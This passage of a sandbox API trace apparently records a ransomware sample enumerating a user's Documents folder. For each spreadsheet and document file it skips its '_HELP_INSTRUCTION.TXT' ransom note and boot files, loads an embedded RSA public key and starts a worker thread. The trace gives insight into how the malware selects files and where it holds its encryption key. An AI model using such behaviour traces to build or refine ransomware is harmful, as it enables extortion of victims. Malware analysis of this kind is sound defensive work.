lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0042.765] StrStrW (lpFirst="nmyti-BLd1o.xlsx", lpSrch="ntldr") returned 0x0 [0042.765] StrStrW (lpFirst="nmyti-BLd1o.xlsx", lpSrch="NTLDR") returned 0x0 [0042.765] StrStrW (lpFirst="nmyti-BLd1o.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0042.765] StrStrW (lpFirst="nmyti-BLd1o.xlsx", lpSrch="ntdetect.com") returned 0x0 [0042.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0042.765] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0042.765] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0042.765] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.765] lstrcpyW (in: lpString1=0x17addc, lpString2="nmyti-BLd1o.xlsx" | out: lpString1="nmyti-BLd1o.xlsx") returned="nmyti-BLd1o.xlsx" [0042.765] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4d4 [0042.766] Sleep (dwMilliseconds=0x96) [0042.943] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0042.943] lstrcmpW (lpString1="qOmkS_BDD92-oYj.xls", lpString2="..") returned 1 [0042.943] lstrcmpW (lpString1="qOmkS_BDD92-oYj.xls", lpString2=".") returned 1 [0042.943] StrStrW (lpFirst="qOmkS_BDD92-oYj.xls", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0042.943] StrStrW (lpFirst="qOmkS_BDD92-oYj.xls", lpSrch="ntldr") returned 0x0 [0042.943] StrStrW (lpFirst="qOmkS_BDD92-oYj.xls", lpSrch="NTLDR") returned 0x0 [0042.943] StrStrW (lpFirst="qOmkS_BDD92-oYj.xls", lpSrch="NTDETECT.COM") returned 0x0 [0042.943] StrStrW (lpFirst="qOmkS_BDD92-oYj.xls", lpSrch="ntdetect.com") returned 0x0 [0042.943] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0042.943] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0042.943] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0042.943] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0042.943] lstrcpyW (in: lpString1=0x17addc, lpString2="qOmkS_BDD92-oYj.xls" | out: lpString1="qOmkS_BDD92-oYj.xls") returned="qOmkS_BDD92-oYj.xls" [0042.943] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0042.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4c8 [0042.943] Sleep (dwMilliseconds=0x96) [0043.128] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0043.128] lstrcmpW (lpString1="seND1DmmOud5.xls", lpString2="..") returned 1 [0043.128] lstrcmpW (lpString1="seND1DmmOud5.xls", lpString2=".") returned 1 [0043.128] StrStrW (lpFirst="seND1DmmOud5.xls", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0043.128] StrStrW (lpFirst="seND1DmmOud5.xls", lpSrch="ntldr") returned 0x0 [0043.128] StrStrW (lpFirst="seND1DmmOud5.xls", lpSrch="NTLDR") returned 0x0 [0043.128] StrStrW (lpFirst="seND1DmmOud5.xls", lpSrch="NTDETECT.COM") returned 0x0 [0043.128] StrStrW (lpFirst="seND1DmmOud5.xls", lpSrch="ntdetect.com") returned 0x0 [0043.128] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0043.128] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0043.128] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0043.128] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.128] lstrcpyW (in: lpString1=0x17addc, lpString2="seND1DmmOud5.xls" | out: lpString1="seND1DmmOud5.xls") returned="seND1DmmOud5.xls" [0043.128] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.128] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4dc [0043.128] Sleep (dwMilliseconds=0x96) [0043.290] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0043.290] lstrcmpW (lpString1="tKsxqcE.csv", lpString2="..") returned 1 [0043.290] lstrcmpW (lpString1="tKsxqcE.csv", lpString2=".") returned 1 [0043.290] StrStrW (lpFirst="tKsxqcE.csv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0043.290] StrStrW (lpFirst="tKsxqcE.csv", lpSrch="ntldr") returned 0x0 [0043.290] StrStrW (lpFirst="tKsxqcE.csv", lpSrch="NTLDR") returned 0x0 [0043.290] StrStrW (lpFirst="tKsxqcE.csv", lpSrch="NTDETECT.COM") returned 0x0 [0043.290] StrStrW (lpFirst="tKsxqcE.csv", lpSrch="ntdetect.com") returned 0x0 [0043.290] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0043.290] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0043.290] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0043.290] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.290] lstrcpyW (in: lpString1=0x17addc, lpString2="tKsxqcE.csv" | out: lpString1="tKsxqcE.csv") returned="tKsxqcE.csv" [0043.290] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4e0 [0043.291] WaitForSingleObject (hHandle=0x4e0, dwMilliseconds=0xffffffff) returned 0x0 [0043.445] Sleep (dwMilliseconds=0x96) [0043.598] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0043.598] lstrcmpW (lpString1="xlbxUnchVTGwsFtof.doc", lpString2="..") returned 1 [0043.598] lstrcmpW (lpString1="xlbxUnchVTGwsFtof.doc", lpString2=".") returned 1 [0043.598] StrStrW (lpFirst="xlbxUnchVTGwsFtof.doc", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0043.598] StrStrW (lpFirst="xlbxUnchVTGwsFtof.doc", lpSrch="ntldr") returned 0x0 [0043.598] StrStrW (lpFirst="xlbxUnchVTGwsFtof.doc", lpSrch="NTLDR") returned 0x0 [0043.598] StrStrW (lpFirst="xlbxUnchVTGwsFtof.doc", lpSrch="NTDETECT.COM") returned 0x0 [0043.598] StrStrW (lpFirst="xlbxUnchVTGwsFtof.doc", lpSrch="ntdetect.com") returned 0x0 [0043.598] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0043.598] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0043.598] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0043.598] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.598] lstrcpyW (in: lpString1=0x17addc, lpString2="xlbxUnchVTGwsFtof.doc" | out: lpString1="xlbxUnchVTGwsFtof.doc") returned="xlbxUnchVTGwsFtof.doc" [0043.598] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f4 [0043.599] Sleep (dwMilliseconds=0x96) [0043.760] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0043.760] lstrcmpW (lpString1="ZN_ n.ots", lpString2="..") returned 1 [0043.760] lstrcmpW (lpString1="ZN_ n.ots", lpString2=".") returned 1 [0043.760] StrStrW (lpFirst="ZN_ n.ots", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0043.760] StrStrW (lpFirst="ZN_ n.ots", lpSrch="ntldr") returned 0x0 [0043.760] StrStrW (lpFirst="ZN_ n.ots", lpSrch="NTLDR") returned 0x0 [0043.760] StrStrW (lpFirst="ZN_ n.ots", lpSrch="NTDETECT.COM") returned 0x0 [0043.760] StrStrW (lpFirst="ZN_ n.ots", lpSrch="ntdetect.com") returned 0x0 [0043.760] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0043.760] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0043.760] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0043.760] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.760] lstrcpyW (in: lpString1=0x17addc, lpString2="ZN_ n.ots" | out: lpString1="ZN_ n.ots") returned="ZN_ n.ots" [0043.760] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4f0 [0043.761] Sleep (dwMilliseconds=0x96) [0043.910] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0043.910] lstrcmpW (lpString1="zRPN8xkNuY7pBA7JA.csv", lpString2="..") returned 1 [0043.910] lstrcmpW (lpString1="zRPN8xkNuY7pBA7JA.csv", lpString2=".") returned 1 [0043.910] StrStrW (lpFirst="zRPN8xkNuY7pBA7JA.csv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0043.910] StrStrW (lpFirst="zRPN8xkNuY7pBA7JA.csv", lpSrch="ntldr") returned 0x0 [0043.910] StrStrW (lpFirst="zRPN8xkNuY7pBA7JA.csv", lpSrch="NTLDR") returned 0x0 [0043.910] StrStrW (lpFirst="zRPN8xkNuY7pBA7JA.csv", lpSrch="NTDETECT.COM") returned 0x0 [0043.910] StrStrW (lpFirst="zRPN8xkNuY7pBA7JA.csv", lpSrch="ntdetect.com") returned 0x0 [0043.910] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="Desktop") returned 0x0 [0043.910] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", lpSrch="DESKTOP") returned 0x0 [0043.910] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned 81 [0043.910] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.910] lstrcpyW (in: lpString1=0x17addc, lpString2="zRPN8xkNuY7pBA7JA.csv" | out: lpString1="zRPN8xkNuY7pBA7JA.csv") returned="zRPN8xkNuY7pBA7JA.csv" [0043.910] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4ec [0043.911] Sleep (dwMilliseconds=0x96) [0044.066] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0044.066] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 1 [0044.066] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 0 [0044.066] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV" [0044.066] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\*.*" [0044.066] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\", 